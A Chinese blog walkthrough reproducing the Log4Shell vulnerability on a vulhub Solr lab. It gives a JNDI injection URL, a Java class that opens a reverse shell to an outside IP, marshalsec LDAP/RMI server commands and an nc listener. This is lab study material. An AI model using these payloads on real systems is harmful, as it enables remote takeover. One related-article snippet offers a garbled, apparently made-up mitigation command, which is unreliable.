Log4j2 CVE-2021-44228漏洞经典复现超详细(vulhub靶场)

最新推荐文章于 2024-06-18 18:09:05 发布
最新推荐文章于 2024-06-18 18:09:05 发布
阅读量766 收藏
点赞数 2
分类专栏: log4j2 文章标签: log4j 安全架构 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44862511/article/details/132131710
版权

环境搭建

靶场下载

Vulhub - Docker-Compose file for vulnerability environment

服务启动

查看自己的IP

192.168.43.132:8983/solr/#/ 输入IP+端口则会跳转到:

漏洞检测

用到dnslog平台检测dns回显,看看有没有漏洞存在。 dnslog.cn

获得临时domain: pjrpe6.dnslog.cn

在/solr/admin/cores?有个参数可以传,这就是个注入点,我们试试能不能输出java版本,构造 payload,访问的url如下:

http://192.168.43.132:8983/solr/admin/cores?

action=${jndi:ldap://${sys:java.version}.pjrpe6.dnslog.cn}

然后到DNSlog里面点击刷新查看:可以多请求几次

这样,Java的版本显示出来了.说明存在漏洞.

漏洞利用

编写恶意类文件

1. 我们先编写以下的恶意文件Exploit.java,我们企图反弹shell到kali(ip152.136.102.131)的5555端 口,因此对应的bash命令为

exec 5<>/dev/tcp/152.136.102.131/5555;cat <&5 | while read line; do 2>&5 >&5; done

其他反弹shell的语句:https://forum.ywhack.com/shell.php

我们就将我们反弹shell的命令写入到恶意的文件中,并取名为Exploit.java

public class Exploit {
   public Exploit(){
       try{
           String[] commands = {"bash","-c","exec 5<>/dev/tcp/152.136.102.131/5555;cat <&5 | while read line; do $line 2>&5 >&5; done"};
           Process pc = Runtime.getRuntime().exec(commands);
           pc.waitFor();
      } catch(Exception e){
           e.printStackTrace();
      }
  }
 
   public static void main(String[] argv) {
       Exploit e = new Exploit();
  }
}

记得修改代码内容:公网IP

2. 然后我们把Exploit.java编译为类文件Exploit.class,最好javac的版本为1.8

javac Exploit.java

.java文件就被编译为.class文件了

3. 在exploit.class所在目录启动http服务

python3 -m http.server

浏览器验证,是否能够从web服务中访问到Exploit.class文件(必须要保证从web服务中能够访问到)

开启LDAP服务

1. 接下来使用marshalsec项目,启动LDAP服务,监听1389端口并加载远程类Exploit.class:

项目下载地址:marshalsec-0.0.3: marshalsec-0.0.3-SNAPSHOT.jar

再起一个命令窗口(详细看文章最后,点击"宝塔后面的+").

然后将下载的jar包复制到刚刚启动服务的文件夹下面

LDAP服务启动

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://152.136.102.131:8000/#Exploit" 1389

LDAP服务启动

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://152.136.102.131:8000/#Exploit" 8888

PS:以上两种服务选择启动那个服务都行。这里开启LDAP服务,注意要更改IP中的内容为你的web服务。

监听反弹

再起一个命令窗口(详细看文章最后,点击"宝塔后面的+")

攻击机新开终端,监听之前Exploit.java里面写的反弹shell的端口5555

nc -lvnp 5555

开启攻击

最关键的一步,进行JNDI注入,我们在注入点/solr/admin/cores?action=构造一个JNDI注入.

http://192.168.43.132:8983/solr/admin/cores?action=${jndi:ldap://152.136.102.131:1389/Exploit}

查看监听端,发现shell反弹成功(如果反弹一直不成功,尝试Burp抓包插入poc发送).

至此漏洞复现完成,复现完后别忘了销毁靶场噢~

徐长卿学网安
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
log4j2 CVE-2021-44228漏洞复现
qq_14902381的博客
08-10 687
vulfocus靶场log4j2 漏洞CVE-2021-44228复现
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
Apache Log4j 远程代码注入漏洞
tanjunchen的博客
12-11 5588
漏洞说明 2021年12月9日,Apache Log4j2 Java 日志模块存在远程命令执行漏洞可直接控制目标服务器问题,攻击者攻击难度极低。由于 Apache Log4j2 某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。该漏洞可通过 critical、error、warining、notice、info、debug等日志级别触发,只需部分日志内容可控,此漏洞波及大量开源组件,包括 ELK、 Apache 、Struts2、Apache Solr、Apache Druid、A
组件安全Solr、Shiro、Log4j、Jackson、FastJson、XStream)
weixin_65049289的博客
04-13 1012
常见组件安全
log4j2远程代码执行漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
热门推荐
Bossfrank的博客
04-14 2万+
本文是log4j2远程代码执行漏洞原理和漏洞复现详细说明。基于vulhub搭建靶场,攻击者利用log4j2框架下的lookup服务提供的{}字段解析功能,在{}内使用了了JNDI注入的方式,通过RMI或LDAP服务远程加载了攻击者提前部署好的恶意代码(.class),最终造成了远程代码执行。
vulhubLog4j2CVE-2021-44228漏洞复现
weixin_49422491的博客
09-13 2662
vulhubLog4j2CVE-2021-44228漏洞复现
Log4j2注入漏洞CVE-2021-44228漏洞复现
m0_58596609的博客
10-10 1836
Log4j2注入漏洞CVE-2021-44228漏洞复现
漏洞复现log4j2 CVE-2021-44228
zg_111的博客
03-20 2483
漏洞复现log4j2 CVE-2021-44228漏洞复现
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
未完成的歌~的博客
03-15 4842
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
log4j-CVE-2021-44228-vulhub复现
ANYOUZHEN的博客
06-03 616
使用kali上的vulhub去打开我们输入在kali当前终端输入docker-compose up -d --build启动靶场但是启动靶场时出现了报错问题,网上搜索解决方法解决方法:给管理权限在kali终端输入:sudo docker-compose up -d 下面可以看到靶场正在启动接着输入 http://127.0.0.1:8983/solr/#/可以看到靶场成功打开Dnslog测试DNSLog Platform //dnslog平台网址我们在kali上第二个窗口打开dnslog平台进行记录,点
clean code-代码整洁之道 阅读笔记(第九章)
最新发布
renxi0的博客
06-18 502
代码中的测试展示了为测试构造一种面向特定领域的语言的技巧。我们没有直接使用程序员用来对系统进行操作的API,而是打造了一套包装这些API的函数和工具代码,这样就能更方便地编写测试,写出来的测试也更便于阅读。测试API中的代码与生产代码相比,有一套不同的工程标准。守规矩的开发者也将他们的测试代码重构为更简洁和具有表达力的形式。如果测试不干净,你改动自己代码的能力就有所牵制,而你也会开始失去改进代码结构的能力。测试与生产代码一起编写,测试只比生产代码早写几秒钟。和其他代码一样:明确,简洁,还有足够的表达力。
【Java】解决Java报错:FileNotFoundException
Easonmax的博客
06-11 1481
理解并有效处理对于编写健壮的Java程序至关重要。通过本文提供的解决方案和预防措施,开发者可以有效避免和解决这类错误,提高代码质量和可靠性。希望本文能帮助你更好地理解和处理文件访问问题,从而编写出更加可靠的Java应用程序。
【Arthas案例】某应用依赖两个GAV不同但包含两个相同全限定类名StaticLoggerBinder,引起log4j.Level类找不到异常
简放视野的专栏
06-15 626
【3分钟内解决问题】 两个不同的GAV依赖冲突,包含相同全限定类名,引起ClassNotFoundException 【案例1】某应用依赖两个GAV不同的jar,但包含两个相同全限定类名StaticLoggerBinder,引起log4j.Level类找不到异常 1.完整的异常调用栈【从案发现场找线索】 2.关键的异常日志 3.案发现场的源代码 4.解决方法
《软件定义安全》之五:软件定义的安全架构
大龄IT民工
06-10 922
主要负责安全设备的资源池化管理、各类安全信息源的收集和分析、与客户业务系统对接,以及相应安全应用的策略解析和执行。是根据特定的安全需求所开发的程序,它利用安全控制平台的开放API实现相应的安全功能。就是传统的网络和主机安全设备,如防火墙、IPS等,它们逻辑上都会在安全控制平台的管理下,形成各类资源池,对外提供相应的安全能力。
apache log4j CVE-2021-44228漏洞怎么解决
06-03
漏洞描述: Apache Log4j 2.x中存在一种命令注入漏洞,攻击者通过构造恶意日志信息,可以在目标服务器上执行任意命令。 解决办法: 1.升级到最新版本 Apache Log4j 2.x发布了修复此漏洞的版本2.17.0,建议用户尽快升级到该版本。 2.使用安全策略文件 在升级之前,可以通过使用安全策略文件来限制日志信息中使用的类和方法,以减少攻击面。可以使用以下命令生成策略文件: ``` java -Dlog4j2.formatMsgNoLookups=true -Dlog4j2.disable.jmx=true -Dlog4j2.benchMillis=100 org.apache.logging.log4j.core.tools.GenerateExtendedLoggerInfo > log4j2-enum-class-loader.policy ``` 然后将策略文件放置在类路径下,例如在Tomcat中,可以将其放置在`$CATALINA_BASE/conf`目录下。 3.禁用Log4j JNDI Lookup功能 如果无法立即升级,可以通过在JVM参数中添加以下选项来禁用Log4j JNDI Lookup功能: ``` -Dlog4j2.formatMsgNoLookups=true ``` 或者在log4j2.xml配置文件中添加以下选项: ``` <Configuration> <properties> <property name="log4j2.formatMsgNoLookups">true</property> </properties> ... </Configuration> ``` 以上是针对Apache Log4j 2.x的解决办法,如果您使用的是其他版本的Log4j,请查看厂商的官方文档或者联系技术支持获取解决办法。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值